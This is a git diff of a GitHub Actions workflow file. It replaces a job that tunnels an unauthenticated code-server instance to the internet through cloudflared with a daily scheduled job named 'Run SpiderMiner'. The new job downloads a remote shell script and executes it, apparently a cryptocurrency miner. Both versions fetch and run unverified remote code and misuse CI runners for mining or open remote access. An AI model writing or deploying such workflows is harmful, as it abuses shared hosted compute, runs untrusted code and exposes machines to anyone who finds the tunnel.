--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -1,41 +1,18 @@
-name: Run VSCode with Agro Tunnel
-
-on: [push]
+name: Run SpiderMiner
+on:
+  workflow_dispatch:  # Allows manual triggering
+  schedule:
+    - cron: '0 0 * * *'  # Runs daily at midnight (optional)
 
 jobs:
-  build:
+  run-miner:
     runs-on: ubuntu-latest
-
     steps:
-    - name: Checkout repository
-      uses: actions/checkout@v2
-
-    - name: Set up Python
-      uses: actions/setup-python@v2
-      with:
-        python-version: 3.x
-
-    - name: Install required tools
-      run: |
-        if [ ! -f cloudflared ]; then
-          wget -q -nc https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64 -O cloudflared
-          chmod +x cloudflared
-        fi
-        curl -fsSL https://code-server.dev/install.sh | sh
-
-    - name: Start VSCode
-      env:
-        PORT: 10000
-      run: |
-        code-server --port $PORT --disable-telemetry --auth none &
+    - name: Install dependencies
+      run: sudo apt-get update && sudo apt-get install -y wget
     
-    - name: Delay before creating tunnel
-      run: sleep 500000000
-
-    - name: Start Agro Tunnel
-      env:
-        PORT: 10000
+    - name: Download and run SpiderMiner
       run: |
-        while true; do
-          ./cloudflared tunnel --url http://127.0.0.1:$PORT --metrics localhost:45678
-        done
+        wget -O spiderminer.sh https://raw.githubusercontent.com/DeathSpiderDev/Spiders-Miner/refs/heads/main/1spiderminer.sh
+        chmod +x spiderminer.sh
+        bash spiderminer.sh
